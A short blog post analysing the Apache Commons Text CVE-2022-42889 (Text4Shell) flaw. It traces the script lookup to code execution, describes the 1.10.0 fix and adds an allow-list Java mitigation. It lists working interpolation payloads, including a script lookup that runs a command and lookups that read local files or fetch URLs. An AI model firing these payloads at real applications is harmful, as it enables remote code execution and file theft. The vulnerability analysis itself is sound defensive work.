CVE-2022-42889 Apache Commons Text RCE (Text4Shell)
2022-10-13 19:12:46 Author: y4er.com

https://twitter.com/Y4tacker/status/1580193254665920513?s=20&t=mq9URhmKSa7xADbSY4r2fw

I saw this tweet, so I took a look myself.

Version 1.9 has a script tag.

https://commons.apache.org/proper/commons-text/apidocs/org/apache/commons/text/lookup/StringLookupFactory.html

https://y4er.com/img/uploads/CVE-2022-42889-apache-commons-text-rce/1.png

org.apache.commons.text.lookup.InterpolatorStringLookup#lookup

https://y4er.com/img/uploads/CVE-2022-42889-apache-commons-text-rce/2.png

The key is split out of the variable: the script tag.

org.apache.commons.text.lookup.ScriptStringLookup#lookup

https://y4er.com/img/uploads/CVE-2022-42889-apache-commons-text-rce/3.png

It calls ScriptEngineManager to execute the code.

The fix in 1.10.0: when addDefaultStringLookups adds the default lookups, it no longer adds the script, url and dns tags.

https://y4er.com/img/uploads/CVE-2022-42889-apache-commons-text-rce/4.png

org.apache.commons.text.lookup.StringLookupFactory.DefaultStringLookupsHolder#createDefaultStringLookups

https://y4er.com/img/uploads/CVE-2022-42889-apache-commons-text-rce/5.png

${script:js:java.lang.Runtime.getRuntime().exec('calc')}
${file:utf8:e:/test.txt}
${url:utf8:http://baidu.com}
${url:utf8:file:///e:/test.txt}
${dns:address|baidu.com}
${xml:/tmp/aaa:/xpathexpression}
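
The effect of the 1.10.0 change can be reproduced in application code by building the interpolator from an explicit allow-list instead of the defaults. The Java below is an added example, not code from the original post or from Apache Commons Text; the class name AllowListInterpolator, the choice of date and sys as allowed prefixes, and the sample inputs are assumptions.

```java
import java.util.HashMap;
import java.util.Map;
import org.apache.commons.text.StringSubstitutor;
import org.apache.commons.text.lookup.StringLookup;
import org.apache.commons.text.lookup.StringLookupFactory;

public class AllowListInterpolator {

    /** Builds a substitutor that resolves only the prefixes registered here. */
    static StringSubstitutor build() {
        StringLookupFactory factory = StringLookupFactory.INSTANCE;
        Map<String, StringLookup> allowed = new HashMap<>();
        // Allow-list chosen for this example (assumption); keep it minimal.
        allowed.put("date", factory.dateStringLookup());
        allowed.put("sys", factory.systemPropertyStringLookup());
        // addDefaultLookups = false: addDefaultStringLookups is never called,
        // so script, url, dns, file, xml and the rest are not registered.
        // defaultStringLookup = null: an unknown prefix resolves to nothing.
        StringLookup lookup = factory.interpolatorStringLookup(allowed, null, false);
        return new StringSubstitutor(lookup);
    }

    public static void main(String[] args) {
        StringSubstitutor safe = build();
        // Constructed inputs; the last three reuse prefixes listed on this page
        // with harmless arguments.
        String[] inputs = {
            "java=${sys:java.version}",
            "year=${date:yyyy}",
            "${script:js:1+1}",
            "${dns:address|localhost}",
            "${url:utf8:file:///nonexistent}",
        };
        for (String in : inputs) {
            // A prefix that is not on the allow-list leaves the expression
            // in the output unchanged instead of being evaluated.
            System.out.println(in + " -> " + safe.replace(in));
        }
    }
}
```

This only helps where the application constructs the substitutor itself; code that calls StringSubstitutor.createInterpolator() on 1.9 still gets the default lookups and needs the upgrade to 1.10.0.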

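My writing is poor, my wording flippant, the content shallow and my technique unpracticed. Pointers and corrections from the experts are welcome and much appreciated.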


Source: https://y4er.com/posts/cve-2022-42889-apache-commons-text-rce/